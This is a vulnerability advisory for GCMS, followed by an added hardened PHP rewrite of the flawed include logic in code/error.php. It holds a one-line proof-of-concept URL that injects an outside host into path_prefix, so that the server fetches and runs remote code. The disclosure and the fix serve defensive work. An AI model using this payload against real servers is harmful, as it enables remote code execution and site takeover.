Version: 1.1
Severity: High
Vendor: http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';

if (empty($main)) {
    require $path_prefix.'code/main.dat';
}

if (isset($e404) or isset($_GET['e404'])) {
...
}

if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->

PoC:
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/

mail me: maggik <at> gala <dot> net
icq: 3316667
greetz to: ghc, 0xdeadbabe, unl0ck & others
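
Added example (not part of the original advisory and not GCMS code): a hardened form of the include logic in "code/error.php", where the base path is fixed on the server instead of coming from $path_prefix. It assumes error.php sits in the "code/" directory one level below the application root; the constant GCMS_ROOT and the helper gcms_path() are hypothetical names.

```php
<?php
// Hardened sketch of the include logic in code/error.php (added example).
// Assumption: this file lives in <application root>/code/.

// Fix the base directory server-side. It is never taken from a variable
// that a request can populate, which is what the PoC relies on.
define('GCMS_ROOT', realpath(__DIR__ . '/..'));

/**
 * Hypothetical helper: resolve a path relative to GCMS_ROOT and return it
 * only if the canonical result is still inside the application root.
 * The names passed below are literals, so this is defence in depth against
 * ../ segments or symlinks if a caller ever passes a computed name.
 */
function gcms_path(string $relative): string
{
    $root   = GCMS_ROOT . DIRECTORY_SEPARATOR;
    $target = realpath($root . $relative);   // false if the file is missing

    if ($target === false || strncmp($target, $root, strlen($root)) !== 0) {
        http_response_code(500);
        error_log('blocked include outside application root: ' . $relative);
        exit;
    }
    return $target;
}

if (!isset($page)) $page = '';

// require stays at file scope so the included files see the same
// variables they did in the original script.
if (empty($main)) {
    require gcms_path('code/main.dat');
}

// ... e404 / e403 handling unchanged from the original ...

require gcms_path('code/blocks.php');
exit;
```

At the PHP configuration level, allow_url_include = Off (the default since PHP 5.2) stops require from fetching an http:// path, and register_globals = Off keeps query-string parameters from becoming script variables.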